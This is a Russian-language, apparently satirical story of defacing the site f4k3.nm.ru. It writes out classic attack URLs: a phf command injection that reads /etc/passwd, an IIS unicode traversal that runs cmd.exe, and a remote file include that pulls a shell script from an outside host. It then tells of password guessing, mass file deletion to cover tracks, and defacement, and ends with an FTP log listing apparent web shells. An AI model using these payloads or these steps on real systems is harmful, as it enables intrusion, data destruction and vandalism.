Как был взломан f4k3.nm.ru


                           Как был взломан f4k3.nm.ru
                           ==========================

Сидели  мы  как-то  в  ире,  пили  пиво.  Делать  было нечего. Решили что-нибудь
дефейсить. Тут под руку попался f4k3.nm.ru - сайт хакирской группы Network Panic
Crew.

Мы  выпили  еще пива и стали думать, как бы нам его дефейсить. Из всего арсенала
хакерских  тулз  у  нас  был  только  браузер,  а  это  усложняло задачу. Искать
более  продвинутые хакерские тулзы в поисковике жутко не хотелось - по дороге их
могли   перехватить   федералы,   кроме   того   на  деле  они  могли  оказаться
разрушительной модификацией вируса OneHalf, о которой не знали наши антивирусные
средства,  использующие  просроченную пиратскую лицензию. Еще больше не хотелось
читать  руководства  по  их  использованию.  Поэтому мы несколько раз перечитали
статью о взломе сайтов через браузер и принялись за дело.

Сначала мы набрали в браузере следующий url:

http://f4k3.nm.ru/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Но,  к  сожалению,  сервер  оказался  хорошо  защищен и не поддался этой атаке -
дефейсить сайт таким образом не удалось.

Мы  несильно  огорчились  и выпили еще пива. В результате некоторой мыслительной
деятельности, было решено набрать следующее:

http://f4k3.nm.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Долбаный администратор предусмотрел и это - взломать сайт такой командой тоже не
получилось.  Мы  расстроились  еще  больше,  и  на  этот раз выпили водки. У нас
оставался единственный выход - попытаться взломать сервер через include-bug:
 
http://f4k3.nm.ru/?page=http://tipa-hacka.narod.ru/shell.php?cmd=id

Но  и на этот раз фортуна не улыбнулась гнилыми зубами. Поняв, что взломать этот
сайт не удастся, мы оставили его.

Спустя две недели, мы узнали о списке наиболее распространенных паролей:

love
sex
god
qweasdzxc

Мы  стали  поочередно  вводить  пароли  и смотреть результат. И как по мановению
волшебной  палочки,  пароль ``qweasdzxc'' подошел, и мы получили полный доступ к
сайту f4k3.nm.ru
Сперва  мы  решили  почистить  логи - для нашей же безопасности. Поскольку мы не
знали,  где  точно находятся логи, было решено удалить все файлы на сайте, что и
было   сделано   при  помощи  дружественного  web-интерфейса.  Затем  мы  решили
приступить  собственно к дефейсу - через web-интерфейс мы создали файл index.htm
и  поместили  туда  всего  одну  строчку  - ``dephaced'' [ потому что plain-text
дефейс  намного  илитней  чем красочный html а-ля DHG ]. После этого мы поменяли
пароль  и другую информацию о сайте, и завершили сеанс. Оставалось сделать самое
главное  в  дефейсинге  -  сообщить  о  факте  взлома  на  void.ru, что и было с
легкостью осуществлено.

Спустя  пол-часа  сайт  был редефейсен неизвестными людьми, вместо нашей строчки
появилась другая:

           0xd3f4c3d 8y m4d 0hd4y 0wn3rz [ m00 ] v14 un1k0d3 8ug h4h4

Конец.


Name (ftp.newmail.ru:root): [email protected]
331 User f4k3 OK.  Password required.
Password:
530 Sorry, f4k3
Login failed.

ftp> user f4k3.nm.ru
331 User f4k3.nm.ru OK.  Password required.
Password: 
230 OK.  Current directory is /

ftp> ls -la
total 1
drwxr-xr-x   4 15229    503         4096 Apr 17 20:43 .
drwxr-xr-x   4 15229    503         4096 Apr 17 20:43 ..
-rw-r--r--   1 15229    501         1007 Jan  3 22:30 STYLE.CSS
-rw-r--r--   1 15229    501        10386 Oct 26  2003 a00.txt
-rw-r--r--   1 15229    501        12735 Oct 24  2003 b00.txt
-rw-r--r--   1 15229    501        33040 Apr  8 22:58 d6v2.txt
-rw-r--r--   1 15229    501        99580 Jan  1 13:02 defaced4.win.rar
-rw-r--r--   1 15229    501        34922 Apr 11 18:21 electron.log
drwxrwxrwx   2 15229    501         4096 Jan  3 21:30 img
-rw-r--r--   1 15229    501        48243 Apr 17 20:42 img1.jpg
-rw-r--r--   1 15229    501        50184 Apr 17 20:43 img2.jpg
-rw-r--r--   1 15229    501         1253 Jan  3 22:30 index.htm
-rw-r--r--   1 15229    501         8389 Jan 20 14:41 lol.html
-rw-r--r--   1 15229    501        33473 Oct 24  2003 mysql.htm
drwxr-xr-x   2 15229    503         4096 Oct  5  2003 rem
-rw-r--r--   1 15229    501        93596 Nov 17  2003 screen.gif
-rw-r--r--   1 15229    501        82266 Dec 24 16:09 screen.jpg
-rw-r--r--   1 15229    501         2362 Nov 22  2003 skaZZ.txt
226-Options: -a -l
226 18 matches total

ftp> cd rem
250 Changed to /rem

ftp> ls
total 1
drwxr-xr-x   2 15229    503         4096 Oct  5  2003 .
drwxr-xr-x   4 15229    503         4096 Apr 17 20:43 ..
-rw-r--r--   1 15229    501        90895 Oct  5  2003 remview.php
-rw-r--r--   1 15229    501        90895 Oct  5  2003 remview.txt
-rw-r--r--   1 15229    501           38 Oct  5  2003 shell.txt
226-Options: -a -l
226 5 matches total

ftp> cd ../img
250 Changed to /img

ftp> ls -la
total 1
drwxrwxrwx   2 15229    501         4096 Jan  3 21:30 .
drwxr-xr-x   4 15229    503         4096 Apr 17 20:43 ..
-rw-rw-rw-   1 15229    501        12288 Jan  3 14:04 Thumbs.db
-rw-rw-rw-   1 15229    501        48428 Jan  3 12:45 face.jpg
-rw-rw-rw-   1 15229    501        24033 Jan  3 14:43 logo.jpg
226-Options: -a -l
226 5 matches total